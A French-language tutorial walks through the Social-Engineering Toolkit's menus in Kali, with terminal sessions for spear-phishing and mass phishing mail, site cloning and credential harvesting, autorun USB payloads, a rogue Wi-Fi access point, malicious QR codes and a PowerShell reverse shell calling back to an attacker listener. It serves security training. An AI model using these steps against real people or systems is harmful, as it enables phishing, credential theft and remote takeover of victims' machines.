SET - Social-Engineering Toolkit
Présentation du Social-Engineering Toolkit
SET est un logiciel développé en Python proposant plusieurs fonctions afin d’abuser des techniques de social engineering. Le social engineering fait référence à des techniques de manipulation de l’être humain.
root@kali:~# setoolkit
..######..########.########
.##....##.##..........##...
.##.......##..........##...
..######..######......##...
.......##.##..........##...
.##....##.##..........##...
..######..########....##...
[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
Version: 7.7.9
Codename: 'Blackout'
[---] Follow us on Twitter: @TrustedSec [---]
[---] Follow me on Twitter: @HackingDave [---]
[---] ...
Spear-Phishing Attack Vectors
La rubrique Spear-Phishing Attack Vectors permet de réaliser des attaques de type spear-phishing. À la différence des attaques de phishing classiques, le spear-phishing se distingue par la personnalisation du message grâce à des informations obtenues auparavant.
set> 1
The Spearphishing module allows you to specially craft email
messages and send them to a large (or small) number of people
with attached fileformat malicious payloads. If you want to spoof
your email address, be sure "Sendmail" is installed (apt-get
install sendmail) and change the config/set_config SENDMAIL=OFF
flag to SENDMAIL=ON.
There are two options, one is getting your feet wet and letting
SET do
everything for you (option 1), the second is to create your own
FileFormat payload and use it in your own attack. Either way, good
luck and enjoy!
1) Perform a Mass Email Attack
2) Create a FileFormat Payload
3) Create a Social-Engineering Template
99) Return to Main Menu
Website Attack Vectors
La rubrique Website Attack Vectors permet de mettre en place un site web malveillant dans le but d’exploiter une vulnérabilité au sein du navigateur de la victime ou bien de jouer de social engineering pour que la victime réalise une action permettant à l’attaquant de prendre le contrôle de la machine à distance :
set> 2
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full Screen Attack Method
8) HTA Attack Method
99) Return to Main Menu
Ne pouvant pas faire un focus sur l’ensemble des vecteurs d’attaque, nous allons nous concentrer sur les deux premiers utilisant le framework Metasploit.
1. Java Applet Attack Method
Comme son nom le laisse envisager, la rubrique Java Applet Attack Method permet non seulement de créer une applet Java malveillante mais aussi de cloner un site web afin de rendre l’attaque particulièrement complexe à identifier :
1)Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) Full...
Infectious Media Generator
La rubrique Infectious Media Generator permet de créer des fichiers autorun.inf à rajouter au sein des clés USB ou des CD/DVD ainsi qu’un payload Metasploit. Une fois la clé USB ou le CD/DVD inséré, l’autorun permet d’exécuter automatiquement la charge.
Sous Windows, les fichiers autorun.inf ne sont plus exécutés automatiquement et silencieusement depuis Windows Vista.
Le patch KB971029 permet également de limiter ces exécutions automatiques sur Windows XP.
Create a Payload and Listener
La rubrique Create a Payload and Listener permet de façon relativement simple de générer un payload et d’exécuter un listener au sein de Metasploit.
Ainsi, les actions suivantes permettent de créer un fichier malveillant exécutant un reverse Meterpreter :
set> 4
1) Windows Shell Reverse_TCP Spawn a command shell on
victim and send back to attacker
2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell
on victim and send back to attacker
3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim
and send back to attacker
4) Windows Shell Reverse_TCP X64 Windows X64 Command Shell,
Reverse TCP Inline
5) Windows Meterpreter Reverse_TCP X64 Connect back to the
attacker (Windows x64), Meterpreter
6) Windows Meterpreter Egress Buster Spawn a meterpreter shell
and find a port home via multiple ports
7) Windows Meterpreter Reverse HTTPS Tunnel communication over
HTTP using SSL and use Meterpreter
8) Windows Meterpreter Reverse DNS Use a hostname instead of
an IP address and use Reverse Meterpreter
9) Download/Run your Own Executable ...
Mass Mailer Attack
Comme son nom le laisse présumer, la rubrique Mass Mailer Attack permet de faire du phishing en masse à destination d’une ou de plusieurs adresses. Ce module permet également d’insérer des liens et/ou fichiers malveillants au sein des e-mails envoyés.
set> 5
Social Engineer Toolkit Mass E-Mailer
There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.
What do you want to do:
1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
99. Return to main menu.
Arduino-Based Attack Vector
La rubrique Arduino-Based Attack Vector permet de transformer un Arduino pour le programmer afin de réaliser des attaques physiques. Ces attaques physiques se basent sur le fait que ce type de périphérique est en mesure de se faire passer pour une souris ou un clavier et de contourner ainsi différentes mesures de protection. On parle en général d’USB HID (Human Interface Device) Attack.
Wireless Access Point Attack Vector
La rubrique Wireless Access Point Attack Vector permet de créer un faux point d’accès Wi-Fi grâce à la suite Aircrack-ng. En effet, grâce à Airbase-ng, AirMon-ng, DNSSpoof et dhcp3, SET va créer un point d’accès et redirige toutes les requêtes DNS vers la machine de l’attaquant. Il sera alors simplement nécessaire de rediriger les victimes vers une attaque vue précédemment.
QRCode Generator Attack Vector
Tout comme la rubrique Wireless Access Point Attack Vector, la rubrique QRCode Generator Attack Vector ne permet pas de réaliser d’attaques. Néanmoins, la génération d’un QRCode permet de camoufler des URL malveillantes :
set> 8
The QRCode Attack Vector will create a QRCode for you with whatever
URL you want.
When you have the QRCode Generated, select an additional attack vector
within SET and deploy the QRCode to your victim. For example, generate
a QRCode of the SET Java Applet and send the QRCode via a mailer.
Enter the URL you want the QRCode to go to (99 to exit):
http://orhus.fr/
[*] QRCode has been generated under
/root/.set/reports/qrcode_attack.png
Une fois généré, il ne reste plus qu’à transmettre le QRCode pointant vers une URL malveillante à une potentielle cible :
Powershell Attack Vectors
Enfin, la rubrique Powershell Attack Vectors permet de créer un code malveillant en PowerShell afin que ce dernier soit exécuté sur un système de type Windows :
set> 9
The Powershell Attack Vector module allows you to create PowerShell
specific attacks. These attacks will allow you to use PowerShell which
is available by default in all operating systems Windows Vista and
above. PowerShell provides a fruitful landscape for deploying
payloads and performing functions that do not get triggered
by preventative technologies.
1) Powershell Alphanumeric Shellcode Injector
2) Powershell Reverse Shell
3) Powershell Bind Shell
4) Powershell Dump SAM Database
99) Return to Main Menu
set:powershell>2
Enter the IPAddress or DNS name for the reverse host: 192.168.171.152
set:powershell> Enter the port for listener [443]: 443
[*] Rewriting the powershell reverse shell with options
[*] Exporting the powershell stuff to /root/.set/reports/powershell
set> Do you want to start a listener [yes/no]: yes
Listening on 0.0.0.0:443
Dans ce cas de figure, le reverse shell en PowerShell se trouve au sein du fichier /root/.set/reports/powershell/powershell.reverse.txt qu’il ne reste plus qu’à déposer et exécuter...